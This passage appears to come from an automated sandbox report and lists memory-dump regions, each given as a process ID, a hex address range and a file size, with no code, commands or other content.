                                                                                                                                    • memory/2320-359-0x0000000000400000-0x00000000004A0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      640KB

                                                                                                                                    • memory/2436-228-0x000001BC0EE90000-0x000001BC0EF00000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2472-222-0x0000022461240000-0x00000224612B0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2644-324-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2680-265-0x000002100AD00000-0x000002100AD70000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2696-272-0x00000201A8CC0000-0x00000201A8D30000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2708-119-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2708-115-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2812-235-0x0000021C65210000-0x0000021C65280000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2848-192-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2920-325-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3364-126-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      88KB

                                                                                                                                    • memory/3364-124-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3656-120-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3656-123-0x0000000002580000-0x0000000002582000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/3740-363-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3744-353-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3744-352-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3744-354-0x0000000004F02000-0x0000000004F03000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3944-141-0x0000000000750000-0x0000000000752000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/3944-132-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4044-114-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/4100-170-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4108-226-0x0000000005270000-0x0000000005876000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      6.0MB

                                                                                                                                    • memory/4108-284-0x00000000068D0000-0x00000000068D1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-188-0x0000000005880000-0x0000000005881000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-291-0x00000000066A0000-0x00000000066A1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-184-0x00000000004171EE-mapping.dmp
                                                                                                                                    • memory/4108-294-0x0000000007300000-0x0000000007301000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-239-0x00000000056E0000-0x00000000056E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-283-0x0000000006330000-0x0000000006331000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-202-0x00000000053D0000-0x00000000053D1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-183-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      112KB

                                                                                                                                    • memory/4108-189-0x0000000005330000-0x0000000005331000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4108-194-0x0000000005390000-0x0000000005391000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4168-323-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4168-179-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4216-360-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4292-349-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4328-171-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4332-177-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4464-153-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4508-198-0x00007FF60B624060-mapping.dmp
                                                                                                                                    • memory/4508-241-0x00000296AFA00000-0x00000296AFA70000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/4508-204-0x00000296AF710000-0x00000296AF75B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/4512-331-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4656-182-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4664-157-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4664-160-0x0000000000110000-0x0000000000111000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4664-163-0x0000000004A80000-0x0000000004A81000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4708-154-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4724-314-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4836-361-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4840-335-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4928-267-0x0000000004E40000-0x0000000004E41000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4928-210-0x00000000005F0000-0x00000000005F1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4928-200-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4944-334-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4972-346-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5032-174-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5076-164-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5100-168-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/5100-165-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5100-169-0x00000000009F0000-0x0000000000A02000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/5188-364-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5204-351-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5232-368-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5256-347-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5256-356-0x0000000000500000-0x000000000050C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      48KB

                                                                                                                                    • memory/5268-214-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5276-287-0x0000019AA1FC0000-0x0000019AA200B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/5276-285-0x00007FF60B624060-mapping.dmp
                                                                                                                                    • memory/5276-330-0x0000019AA4800000-0x0000019AA48FF000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1020KB

                                                                                                                                    • memory/5276-289-0x0000019AA22D0000-0x0000019AA2341000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      452KB

                                                                                                                                    • memory/5384-340-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5384-343-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/5384-344-0x00000000005A0000-0x00000000005B2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/5396-362-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5492-318-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5540-242-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5592-350-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5620-317-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5624-355-0x0000000000402F68-mapping.dmp
                                                                                                                                    • memory/5624-357-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      48KB

                                                                                                                                    • memory/5632-259-0x0000000000120000-0x0000000000121000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/5632-250-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5632-270-0x0000000000630000-0x0000000000631000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/5632-273-0x0000000000650000-0x000000000066B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      108KB

                                                                                                                                    • memory/5632-277-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/5632-278-0x000000001AED0000-0x000000001AED2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/5640-319-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5688-365-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5744-339-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5764-332-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5764-367-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5868-274-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5976-279-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/6012-369-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/6084-313-0x000000000042977E-mapping.dmp
                                                                                                                                    • memory/6084-321-0x0000000005190000-0x0000000005206000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      472KB

                                                                                                                                    • memory/6104-310-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/6104-316-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB